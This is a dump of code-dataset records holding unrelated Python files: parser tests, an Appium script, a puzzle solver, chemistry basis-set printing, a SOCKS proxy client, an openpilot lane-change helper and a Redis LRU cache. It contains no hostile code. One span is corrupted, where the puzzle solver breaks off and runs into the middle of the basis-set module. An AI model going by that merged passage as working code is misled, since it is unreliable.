TextParser()\n parser.configure({'format': 'json'})\n t, record = parser.parse('{\"time\":1362020400,\"host\":\"192.168.0.1\",\"size\":777,\"method\":\"PUT\"}')\n assert t == 1362020400\n assert record == {\n 'host' : '192.168.0.1',\n 'size' : 777,\n 'method': 'PUT',\n }\n\ndef test_nginx():\n parser = TextParser()\n parser.configure({'format': 'nginx'})\n t, record = parser.parse('127.0.0.1 192.168.0.1 - [28/Feb/2013:12:00:00 +0900] \"GET / HTTP/1.1\" 200 777 \"-\" \"Opera/12.0\"')\n tm = time.gmtime(t)\n assert (tm.tm_year, tm.tm_mon, tm.tm_mday) == (2013, 2, 28)\n assert (tm.tm_hour, tm.tm_min, tm.tm_sec) == (3, 0, 0)\n assert record == {\n 'remote' : '127.0.0.1',\n 'host' : '192.168.0.1',\n 'user' : '-',\n 'method' : 'GET',\n 'path' : '/',\n 'code' : '200',\n 'size' : '777',\n 'referer': '-',\n 'agent' : 'Opera/12.0',\n }\n\ndef test_ltsv_config():\n parser = TextParser()\n parser.configure({'format': 'ltsv'})\n\n assert parser.parser.delimiter == '\\t'\n assert parser.parser.label_delimiter == ':'\n\n parser.configure({\n 'format': 'ltsv',\n 'delimiter': ',',\n 'label_delimiter': '=',\n })\n\n assert parser.parser.delimiter == ','\n assert parser.parser.label_delimiter == '='\n\ndef test_ltsv():\n parser = TextParser()\n parser.configure({'format': 'ltsv'})\n\n _, record = parser.parse(\"time:[28/Feb/2013:12:00:00 +0900]\\thost:192.168.0.1\\treq:GET /list HTTP/1.1\")\n\n assert record == {\n 'time':'[28/Feb/2013:12:00:00 +0900]',\n 'host':'192.168.0.1',\n 'req' :'GET /list HTTP/1.1',\n }\n\ndef test_ltsv_cosutomized_delimiter():\n parser = TextParser()\n parser.configure({'format': 'ltsv', 'delimiter':',', 'label_delimiter':'='})\n\n _, record = 
parser.parse('time=[28/Feb/2013:12:00:00 +0900],host=192.168.0.1,req=GET /list HTTP/1.1')\n\n assert record == {\n 'time':'[28/Feb/2013:12:00:00 +0900]',\n 'host':'192.168.0.1',\n 'req' :'GET /list HTTP/1.1',\n }\n","sub_path":"fluenpy/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"76443786","text":"import time\nfrom appium import webdriver\n\n# server launch parameters\ndesired_caps = {}\n# device information\ndesired_caps['platformName'] = 'Android'\ndesired_caps['platformVersion'] = '5.1'\ndesired_caps['deviceName'] = '192.168.56.101:5555'\n# app information\ndesired_caps['appPackage'] = 'com.android.settings'\ndesired_caps['appActivity'] = '.Settings'\n\n# declare our driver object\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\nsave_button = driver.find_element_by_xpath(\"//*[contains(@text,'存储')]\")\nmore_button = driver.find_element_by_xpath(\"//*[contains(@text,'更多')]\")\n# battery_button = driver.find_element_by_xpath(\"//*[contains(@text,'电池')]\")\n\n\n# driver.drag_and_drop(save_button, more_button)\n# driver.drag_and_drop(save_button, more_button)\n# driver.drag_and_drop(save_button, more_button)\ndriver.drag_and_drop(save_button, more_button)\n\n\n# user_button = driver.find_element_by_xpath(\"//*[contains(@text,'用户')]\")\n#\n# driver.drag_and_drop(user_button, save_button)\n\n# difference between scroll and drag: drag has no \"inertia\"\n# similarity: both take elements as arguments\n# compared with swipe: one passes elements (drag), the other passes coordinates (swipe),\n# and when the swipe duration is long enough the effect is the same as drag\n\n# if find_ele finds an element, its exact position is cached by the system;\n# unless it is looked up again, the element is assumed to be at the cached position even after it has moved off screen\n\n# as long as part of an element is visible on screen, find_ele will still locate it\n\n","sub_path":"就业班/第六阶段 移动自动化/移动自动化day3/02-代码/01-滑动和拖拽/drag.py","file_name":"drag.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"15058524","text":"import heapq\n\nN = int(input())\n\nboard = []\nfor _ in range(N):\n board.append(list(map(int, input().split())))\n\nstart = (0, 0)\nfor i in range(N):\n for j in range(N):\n if board[i][j] == 9:\n start = (i, j)\n\nmx = [-1, 0, 0, 1]\nmy = [0, -1, 1, 0]\n\ndef eat(board, start, size):\n N = len(board)\n s = (0, start[0], start[1])\n q = [s]\n visit = [[0]*N for _ in range(N)]\n visit[start[0]][start[1]] = 1\n board[start[0]][start[1]] = 0\n\n while q:\n t, x, y = heapq.heappop(q)\n \n if 0highest, then put the highest at the beginning\n ecp_list = sorted(eldata['elementECP'], key=lambda x: x['potentialAngularMomentum'])\n ecp_list.insert(0, ecp_list.pop())\n\n for pot in ecp_list:\n print_ecp_pot(pot)\n\n\ndef print_component_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n eldata = basis['basisSetElements']\n\n # Filter to the given elements\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # Electron Basis\n for z in elements:\n print_element(z, eldata[z])\n\n\ndef print_element_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n\n eldata = basis['basisSetElements']\n\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # strings\n complist = {z: ' '.join(eldata[z]['elementComponents']) for z in elements}\n reflist = {z: ' '.join(eldata[z]['elementReferences']) for z in elements 
if 'elementReferences' in eldata[z]}\n\n max_comp = max([len(x) for k, x in complist.items()])\n max_comp = max(max_comp, len(\"Components\"))\n\n # Header line\n print('{:4} {:{}} {:20}'.format(\"El\", \"Components\", max_comp + 1, \"References\"))\n print('-' * 80)\n for z in elements:\n data = basis['basisSetElements'][z]\n\n sym = lut.element_sym_from_Z(z)\n sym = lut.normalize_element_symbol(sym)\n\n print('{:4} {:{}} {:20}'.format(sym, complist[z], max_comp + 1, reflist[z] if z in reflist else 'None'))\n\n print()\n\n\ndef print_table_basis(basis, elements=None):\n print(\"Basis set: \" + basis['basisSetName'])\n print(\"Description: \" + basis['basisSetDescription'])\n print(\"Role: \" + basis['basisSetRole'])\n print()\n\n eldata = basis['basisSetElements']\n\n if elements is None:\n elements = list(eldata.keys())\n else:\n elements = [k for k in eldata.keys() if k in elements]\n\n # strings\n complist = {z: eldata[z]['elementEntry'] for z in elements}\n reflist = {z: eldata[z]['elementReferences'] for z in elements if 'elementReferences' in eldata[z]}\n\n max_comp = max([len(x) for k, x in complist.items()])\n max_comp = max(max_comp, len(\"Components\"))\n\n # Header line\n print('{:4} {:{}} {:20}'.format(\"El\", \"Entry\", max_comp + 1, \"References\"))\n print('-' * 80)\n for z in elements:\n data = basis['basisSetElements'][z]\n\n sym = lut.element_sym_from_Z(z)\n sym = lut.normalize_element_symbol(sym)\n\n print('{:4} {:{}} {:20}'.format(sym, complist[z], max_comp + 1, reflist[z] if z in reflist else 'None'))\n\n print()\n\n\ndef print_citation(citkey, cit):\n print(\"Citation: {}\".format(citkey))\n\n doistr = cit['DOI'] if 'DOI' in cit else 'MISSING'\n print(\" DOI: {}\".format(doistr))\n\n titlestr = cit['title'] if 'title' in cit else 'MISSING'\n print(\" Title: {}\".format(titlestr))\n\n if 'authors' in cit and len(cit['authors']) > 0:\n print(\" Authors: {}\".format(cit['authors'][0]))\n for a in cit['authors'][1:]:\n print(\" {}\".format(a))\n else:\n print(\" Authors: NONE\")\n\n journalstr = cit['journal'] if 'journal' in cit else \"MISSING\"\n volumestr = cit['volume'] if 'volume' in cit else \"MISSING\"\n pagestr = cit['page'] if 'page' in cit else \"MISSING\"\n yearstr = cit['year'] if 'year' in cit else \"MISSING\"\n\n print(\" {} v{} pp {} ({})\".format(journalstr, volumestr, pagestr, yearstr))\n","sub_path":"bse/curate/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"389853920","text":"# Copyright (c) 2018, Neil Booth\n#\n# All rights reserved.\n#\n# The MIT License (MIT)\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'''SOCKS proxying.'''\n\nimport asyncio\nimport collections\nimport ipaddress\nimport socket\nimport struct\n\nfrom .util import Timeout\n\n\n__all__ = ('SOCKSUserAuth', 'SOCKS4', 'SOCKS4a', 'SOCKS5', 'SOCKSProxy',\n 'SOCKSError', 'SOCKSProtocolError', 'SOCKSFailure')\n\n\nSOCKSUserAuth = collections.namedtuple(\"SOCKSUserAuth\", \"username password\")\n\n\nclass SOCKSError(Exception):\n '''Base class for SOCKS exceptions. Each raised exception will be\n an instance of a derived class.'''\n\n\nclass SOCKSProtocolError(SOCKSError):\n '''Raised when the proxy does not follow the SOCKS protocol'''\n\n\nclass SOCKSFailure(SOCKSError):\n '''Raised when the proxy refuses or fails to make a connection'''\n\n\nclass SOCKSBase(object):\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n raise NotImplementedError\n\n @classmethod\n def name(cls):\n return cls.__name__\n\n @classmethod\n async def sock_recv(cls, loop, socket, n):\n result = b''\n while len(result) < n:\n data = await loop.sock_recv(socket, n - len(result))\n if not data:\n break\n result += data\n return result\n\n\nclass SOCKS4(SOCKSBase):\n '''SOCKS4 protocol wrapper.'''\n\n # See http://ftp.icm.edu.pl/packages/socks/socks4/SOCKS4.protocol\n REPLY_CODES = {\n 90: 'request granted',\n 91: 'request rejected or failed',\n 92: ('request rejected because SOCKS server cannot connect '\n 'to identd on the client'),\n 93: ('request rejected because the client program and identd '\n 'report different user-ids')\n }\n\n @classmethod\n async def _handshake(cls, socket, dst_host, dst_port, auth, loop):\n if isinstance(dst_host, ipaddress.IPv4Address):\n # SOCKS4\n dst_ip_packed = dst_host.packed\n host_bytes = b''\n else:\n # SOCKS4a\n dst_ip_packed = b'\\0\\0\\0\\1'\n host_bytes = dst_host.encode() + b'\\0'\n\n if isinstance(auth, SOCKSUserAuth):\n user_id = auth.username.encode()\n else:\n user_id = b''\n\n # Send TCP/IP stream CONNECT request\n data = b''.join([b'\\4\\1', struct.pack('>H', dst_port), dst_ip_packed,\n user_id, b'\\0', host_bytes])\n await loop.sock_sendall(socket, data)\n\n # Wait for 8-byte response\n data = await cls.sock_recv(loop, socket, 8)\n if len(data) != 8 or data[0] != 0:\n raise SOCKSProtocolError(f'invalid {cls.name()} proxy '\n f'response: {data}')\n reply_code = data[1]\n if reply_code != 90:\n msg = cls.REPLY_CODES.get(\n reply_code, f'unknown {cls.name()} reply code {reply_code}')\n raise SOCKSFailure(f'{cls.name()} proxy request failed: {msg}')\n # Remaining fields ignored\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, ipaddress.IPv4Address):\n try:\n dst_host = ipaddress.IPv4Address(dst_host)\n except ValueError:\n raise SOCKSProtocolError(\n f'SOCKS4 requires an IPv4 address: {dst_host}') from None\n await cls._handshake(socket, dst_host, dst_port, auth, loop)\n\n\nclass SOCKS4a(SOCKS4):\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, (str, ipaddress.IPv4Address)):\n raise SOCKSProtocolError(\n f'SOCKS4a requires an IPv4 address or host name: {dst_host}')\n await cls._handshake(socket, dst_host, dst_port, auth, loop)\n\n\nclass SOCKS5(SOCKSBase):\n '''SOCKS protocol 
wrapper.'''\n\n # See https://tools.ietf.org/html/rfc1928\n ERROR_CODES = {\n 1: 'general SOCKS server failure',\n 2: 'connection not allowed by ruleset',\n 3: 'network unreachable',\n 4: 'host unreachable',\n 5: 'connection refused',\n 6: 'TTL expired',\n 7: 'command not supported',\n 8: 'address type not supported',\n }\n\n @classmethod\n async def handshake(cls, socket, dst_host, dst_port, auth, loop):\n if not isinstance(dst_host, (str, ipaddress.IPv4Address,\n ipaddress.IPv6Address)):\n raise SOCKSProtocolError(f'SOCKS5 requires an IPv4 address, IPv6 '\n f'address, or host name: {dst_host}')\n\n # Initial handshake\n if isinstance(auth, SOCKSUserAuth):\n user_bytes = auth.username.encode()\n pwd_bytes = auth.password.encode()\n methods = [0, 2]\n else:\n methods = [0]\n\n greeting = b'\\5' + bytes([len(methods)]) + bytes(m for m in methods)\n await loop.sock_sendall(socket, greeting)\n\n # Get response\n data = await cls.sock_recv(loop, socket, 2)\n if len(data) != 2 or data[0] != 5:\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy response: {data}')\n if data[1] not in methods:\n raise SOCKSFailure('SOCKS5 proxy rejected authentication methods')\n\n # Authenticate if user-password authentication\n if data[1] == 2:\n if not 0 < len(user_bytes) < 256:\n raise SOCKSFailure(f'invalid username length: {auth.username}')\n if not 0 < len(pwd_bytes) < 256:\n raise SOCKSFailure(f'invalid password length: {auth.password}')\n auth_msg = b''.join([bytes([1, len(user_bytes)]), user_bytes,\n bytes([len(pwd_bytes)]), pwd_bytes])\n await loop.sock_sendall(socket, auth_msg)\n data = await cls.sock_recv(loop, socket, 2)\n if data[0] != 1 or len(data) != 2:\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy auth '\n f'response: {data}')\n if data[1] != 0:\n raise SOCKSFailure(f'SOCKS5 proxy auth failure code: '\n f'{data[1]}')\n\n # Send connection request\n if isinstance(dst_host, ipaddress.IPv4Address):\n addr = b'\\1' + dst_host.packed\n elif isinstance(dst_host, ipaddress.IPv6Address):\n addr = b'\\4' + dst_host.packed\n else:\n host = dst_host.encode()\n if len(host) > 255:\n raise SOCKSFailure(f'hostname too long: {len(host)} bytes')\n addr = b'\\3' + bytes([len(host)]) + host\n data = b''.join([b'\\5\\1\\0', addr, struct.pack('>H', dst_port)])\n await loop.sock_sendall(socket, data)\n\n # Get response\n data = await cls.sock_recv(loop, socket, 5)\n if (len(data) != 5 or data[0] != 5 or data[2] != 0 or\n data[3] not in (1, 3, 4)):\n raise SOCKSProtocolError(f'invalid SOCKS5 proxy response: {data}')\n if data[1] != 0:\n raise SOCKSFailure(cls.ERROR_CODES.get(\n data[1], f'unknown SOCKS5 error code: {data[1]}'))\n if data[3] == 1:\n addr_len, data = 3, data[4:] # IPv4\n elif data[3] == 3:\n addr_len, data = data[4], b'' # Hostname\n else:\n addr_len, data = 15, data[4:] # IPv6\n remaining_len = addr_len + 2\n rest = await cls.sock_recv(loop, socket, remaining_len)\n if len(rest) != remaining_len:\n raise SOCKSProtocolError(f'short SOCKS5 proxy reply: {rest}')\n\n\nclass SOCKSProxy(object):\n\n def __init__(self, address, protocol, auth):\n '''A SOCKS proxy at an address following a SOCKS protocol. 
auth is an\n authentication method to use when connecting, or None.\n\n address is a (host, port) pair; for IPv6 it can instead be a\n (host, port, flowinfo, scopeid) 4-tuple.\n '''\n self.address = address\n self.protocol = protocol\n self.auth = auth\n # Set on each successful connection via the proxy to the\n # result of socket.getpeername()\n self.peername = None\n\n def __str__(self):\n auth = 'username' if self.auth else 'none'\n return f'{self.protocol.name()} proxy at {self.address}, auth: {auth}'\n\n async def _connect_one(self, host, port, loop, timeout):\n '''Connect to the proxy and perform a handshake requesting a\n connection to (host, port).\n\n Return the open socket on success, or the exception on failure.\n '''\n sock = socket.socket()\n try:\n sock.setblocking(False)\n with Timeout(timeout, loop) as t:\n await t.run(loop.sock_connect(sock, self.address))\n await t.run(self.protocol.handshake(sock, host, port,\n self.auth, loop))\n self.peername = sock.getpeername()\n return sock\n except Exception as e:\n sock.close()\n return e\n\n async def _connect(self, addresses, loop, timeout):\n '''Connect to the proxy and perform a handshake requesting a\n connection to each address in addresses.\n\n Return an (open_socket, address) pair on success.\n '''\n assert len(addresses) > 0\n\n exceptions = []\n for address in addresses:\n host, port = address[:2]\n sock = await self._connect_one(host, port, loop, timeout)\n if isinstance(sock, socket.socket):\n return sock, address\n exceptions.append(sock)\n\n strings = set(str(exc) for exc in exceptions)\n raise (exceptions[0] if len(strings) == 1 else\n OSError(f'multiple exceptions: {\", \".join(strings)}'))\n\n async def _detect_proxy(self, loop, timeout):\n '''Return True if it appears we can connect to a SOCKS proxy,\n otherwise False.\n '''\n if self.protocol is SOCKS4a:\n host, port = 'www.google.com', 80\n else:\n host, port = ipaddress.IPv4Address('8.8.8.8'), 53\n\n sock = await self._connect_one(host, port, loop, timeout)\n if isinstance(sock, socket.socket):\n sock.close()\n return True\n\n # SOCKSFailure indicates something failed, but that we are\n # likely talking to a proxy\n return isinstance(sock, SOCKSFailure)\n\n @classmethod\n async def auto_detect_address(cls, address, auth, *, loop=None,\n timeout=5.0):\n '''Try to detect a SOCKS proxy at address using the authentication\n method (or None). SOCKS5, SOCKS4a and SOCKS are tried in\n order. If a SOCKS proxy is detected a SOCKSProxy object is\n returned.\n\n Returning a SOCKSProxy does not mean it is functioning - for\n example, it may have no network connectivity.\n\n If no proxy is detected return None.\n '''\n loop = loop or asyncio.get_event_loop()\n for protocol in (SOCKS5, SOCKS4a, SOCKS4):\n proxy = cls(address, protocol, auth)\n if await proxy._detect_proxy(loop, timeout):\n return proxy\n return None\n\n @classmethod\n async def auto_detect_host(cls, host, ports, auth, *, loop=None,\n timeout=5.0):\n '''Try to detect a SOCKS proxy on a host on one of the ports.\n\n Calls auto_detect for the ports in order. 
Returns SOCKS are\n tried in order; a SOCKSProxy object for the first detected\n proxy is returned.\n\n Returning a SOCKSProxy does not mean it is functioning - for\n example, it may have no network connectivity.\n\n If no proxy is detected return None.\n '''\n for port in ports:\n address = (host, port)\n proxy = await cls.auto_detect_address(address, auth,\n loop=loop, timeout=timeout)\n if proxy:\n return proxy\n\n return None\n\n async def create_connection(self, protocol_factory, host, port, *,\n resolve=False, timeout=30.0, loop=None,\n ssl=None, family=0, proto=0, flags=0):\n '''Set up a connection to (host, port) through the proxy.\n\n If resolve is True then host is resolved locally with\n getaddrinfo using family, proto and flags, otherwise the proxy\n is asked to resolve host.\n\n The function signature is similar to loop.create_connection()\n with the same result. The attribute _address is set on the\n protocol to the address of the successful remote connection.\n Additionally raises SOCKSError if something goes wrong with\n the proxy handshake.\n '''\n loop = loop or asyncio.get_event_loop()\n if resolve:\n infos = await loop.getaddrinfo(host, port, family=family,\n type=socket.SOCK_STREAM,\n proto=proto, flags=flags)\n addresses = [info[4] for info in infos]\n else:\n addresses = [(host, port)]\n\n sock, address = await self._connect(addresses, loop, timeout)\n\n def set_address():\n protocol = protocol_factory()\n protocol._address = address\n return protocol\n\n return await loop.create_connection(\n set_address, sock=sock, ssl=ssl,\n server_hostname=host if ssl else None)\n","sub_path":"aiorpcx/socks.py","file_name":"socks.py","file_ext":"py","file_size_in_byte":14605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"463513170","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/quintagroup/pingtool/utils.py\n# Compiled at: 2009-03-31 04:47:33\nfrom zope.schema.vocabulary import SimpleVocabulary\nfrom Products.CMFCore.utils import getToolByName\n\ndef getPingSites(context):\n pp = getToolByName(context, 'portal_pingtool', None)\n values = []\n if pp:\n values = tuple([ (i.Title(), i.id) for i in pp.objectValues() ])\n return SimpleVocabulary.fromItems(values)","sub_path":"pycfiles/quintagroup.pingtool-1.1.3-py2.4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"69166624","text":"directory = 'C:/users/hai/my projects/google code jam/2013/round1b/A/'\r\n\r\n\r\n\r\ndef solve (f_in, f_out):\r\n T = int(f_in.readline())\r\n for testcase in range(1,T+1):\r\n #print (testcase)\r\n A,N = [int(x) for x in f_in.readline().split()]\r\n s = [int(x) for x in f_in.readline().split()]\r\n s.sort()\r\n sugg = [len(s)]\r\n if A == 1 and s[0] >=1:\r\n pass\r\n else:\r\n moves = 0\r\n while s:\r\n while A <= s[0]:\r\n moves += 1\r\n A = A*2-1\r\n A += s[0]\r\n s = s[1:]\r\n sugg.append(moves + len(s))\r\n result = min(sugg)\r\n f_out.write('Case #' + str(testcase) + ': '+ str(min(sugg)) + '\\n')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main_run():\r\n import os\r\n import time\r\n filenames = [x for x in os.listdir (directory)]\r\n filenames = [x for x in filenames if x.endswith('.in')]\r\n l1 = [(os.stat(directory+x).st_mtime, x) for x in filenames]\r\n 
chosen_filename = sorted(l1)[-1][1][:-3]\r\n\r\n print ('Directory : ', directory)\r\n print ('Chosen Filename : ',chosen_filename)\r\n print()\r\n print ('Start : ', time.ctime())\r\n print()\r\n \r\n f_in = open(directory+chosen_filename+'.in')\r\n f_out = open(directory+chosen_filename+'.out', 'w')\r\n solve(f_in,f_out)\r\n f_in.close()\r\n f_out.close()\r\n\r\n print ()\r\n print ('End : ', time.ctime())\r\n\r\n\r\nmain_run()\r\n","sub_path":"solutions_2692487_1/Python/bigOnion/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"146774427","text":"from cereal import log\nfrom common.realtime import sec_since_boot, DT_MDL\nfrom selfdrive.config import Conversions as CV\n\nLaneChangeState = log.LateralPlan.LaneChangeState\nLaneChangeDirection = log.LateralPlan.LaneChangeDirection\n\nLANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS\nLANE_CHANGE_TIME_MAX = 10.\nDP_TORQUE_APPLY_DURATION = 1.5\n\nDESIRES = {\n LaneChangeDirection.none: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,\n },\n LaneChangeDirection.left: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,\n },\n LaneChangeDirection.right: {\n LaneChangeState.off: log.LateralPlan.Desire.none,\n LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,\n LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,\n LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,\n },\n}\n\n\nclass DesireHelper:\n def __init__(self):\n self.lane_change_state = LaneChangeState.off\n self.lane_change_direction = LaneChangeDirection.none\n self.lane_change_timer = 0.0\n self.lane_change_ll_prob = 1.0\n self.keep_pulse_timer = 0.0\n self.prev_one_blinker = False\n self.desire = log.LateralPlan.Desire.none\n\n # dp\n # self.dp_torque_apply_length = 1.5 # secs of torque we apply for\n self.dp_lc_auto_start = 0. # time to start alc\n self.dp_lc_auto_start_in = 0. # remaining time to start alc\n self.dp_lc_auto_torque_end = 0. 
# time to end applying torque\n self.dp_torque_apply = False # should we apply torque?\n\n def update(self, carstate, active, lane_change_prob, dragon_conf):\n v_ego = carstate.vEgo\n one_blinker = carstate.leftBlinker != carstate.rightBlinker\n below_lane_change_speed = v_ego < (dragon_conf.dpLcMinMph * CV.MPH_TO_MS)\n\n if not active or self.lane_change_timer > LANE_CHANGE_TIME_MAX:\n self.lane_change_state = LaneChangeState.off\n self.lane_change_direction = LaneChangeDirection.none\n else:\n reset = False\n if one_blinker:\n cur_time = sec_since_boot()\n # reach auto lc condition\n if not below_lane_change_speed and dragon_conf.dpLateralMode == 2 and v_ego >= (dragon_conf.dpLcAutoMinMph * CV.MPH_TO_MS):\n # work out alc start time and torque apply end time\n if self.dp_lc_auto_start == 0.:\n self.dp_lc_auto_start = cur_time + dragon_conf.dpLcAutoDelay\n self.dp_lc_auto_torque_end = self.dp_lc_auto_start + DP_TORQUE_APPLY_DURATION\n else:\n # work out how long til alc start\n # for display only\n self.dp_lc_auto_start_in = self.dp_lc_auto_start - cur_time\n self.dp_torque_apply = True if self.dp_lc_auto_start < cur_time <= self.dp_lc_auto_torque_end else False\n else:\n reset = True\n\n # reset all vals\n if not active or reset:\n self.dp_lc_auto_start = 0.\n self.dp_lc_auto_start_in = 0.\n self.dp_lc_auto_torque_end = 0.\n self.dp_torque_apply = False\n\n # LaneChangeState.off\n if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:\n self.lane_change_state = LaneChangeState.preLaneChange\n self.lane_change_ll_prob = 1.0\n\n # LaneChangeState.preLaneChange\n elif self.lane_change_state == LaneChangeState.preLaneChange:\n # Set lane change direction\n self.lane_change_direction = LaneChangeDirection.left if \\\n carstate.leftBlinker else LaneChangeDirection.right\n\n torque_applied = carstate.steeringPressed and \\\n ((carstate.steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or\n (carstate.steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))\n\n blindspot_detected = ((carstate.leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or\n (carstate.rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))\n\n # if human made lane change prior alca, we should stop alca until new blinker (off -> on)\n self.dp_lc_auto_start = self.dp_lc_auto_torque_end if torque_applied else self.dp_lc_auto_start\n torque_applied = self.dp_torque_apply if self.dp_torque_apply else torque_applied\n if not one_blinker or below_lane_change_speed:\n self.lane_change_state = LaneChangeState.off\n elif torque_applied and not blindspot_detected:\n self.lane_change_state = LaneChangeState.laneChangeStarting\n\n # LaneChangeState.laneChangeStarting\n elif self.lane_change_state == LaneChangeState.laneChangeStarting:\n # fade out over .5s\n self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2 * DT_MDL, 0.0)\n\n # 98% certainty\n if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:\n self.lane_change_state = LaneChangeState.laneChangeFinishing\n\n # LaneChangeState.laneChangeFinishing\n elif self.lane_change_state == LaneChangeState.laneChangeFinishing:\n # fade in laneline over 1s\n self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)\n\n if self.lane_change_ll_prob > 0.99:\n self.lane_change_direction = LaneChangeDirection.none\n if one_blinker:\n self.lane_change_state = LaneChangeState.preLaneChange\n else:\n 
self.lane_change_state = LaneChangeState.off\n\n if self.lane_change_state in (LaneChangeState.off, LaneChangeState.preLaneChange):\n self.lane_change_timer = 0.0\n else:\n self.lane_change_timer += DT_MDL\n\n self.prev_one_blinker = one_blinker\n\n self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]\n\n # Send keep pulse once per second during LaneChangeStart.preLaneChange\n if self.lane_change_state in (LaneChangeState.off, LaneChangeState.laneChangeStarting):\n self.keep_pulse_timer = 0.0\n elif self.lane_change_state == LaneChangeState.preLaneChange:\n self.keep_pulse_timer += DT_MDL\n if self.keep_pulse_timer > 1.0:\n self.keep_pulse_timer = 0.0\n elif self.desire in (log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight):\n self.desire = log.LateralPlan.Desire.none\n","sub_path":"selfdrive/controls/lib/desire_helper.py","file_name":"desire_helper.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"249354940","text":"import time\nfrom threading import RLock\nfrom Q3.RedisCache import RedisCache\nfrom collections import OrderedDict\n\n\nclass LRUCache(OrderedDict):\n def __init__(self, max_len=128, max_age_seconds=60, redis_host='localhost', redis_port=6379, redis_db=0, cache_name='lrucache'):\n super().__init__()\n assert max_age_seconds >= 0\n assert max_len >= 1\n\n self.max_len = max_len # the capacity\n self.max_age = max_age_seconds\n self.lock = RLock()\n self.redis_conn = RedisCache(cache_name, redis_host, redis_port, redis_db)\n self.get_items_from_cache() # get the former cache from database\n\n def __contains__(self, key):\n \"\"\" Return True if the dict has a key, else return False. \"\"\"\n try:\n with self.lock:\n item = OrderedDict.__getitem__(self, key)\n if time.time() - item[1] < self.max_age:\n return True\n else:\n del self[key]\n self.redis_conn.remove(key)\n except KeyError:\n pass\n return False\n\n def __getitem__(self, key):\n \"\"\" Return the item of the dict.\n Raises a KeyError if key is not in the map.\n \"\"\"\n with self.lock:\n cur_time = time.time()\n item = OrderedDict.__getitem__(self, key)\n item_age = cur_time - item[1]\n if item_age < self.max_age:\n return item[0]\n else:\n del self[key]\n self.redis_conn.remove(key)\n raise KeyError(key)\n\n def __setitem__(self, key, value, cur_time=time.time()):\n \"\"\" Set d[key] to value. 
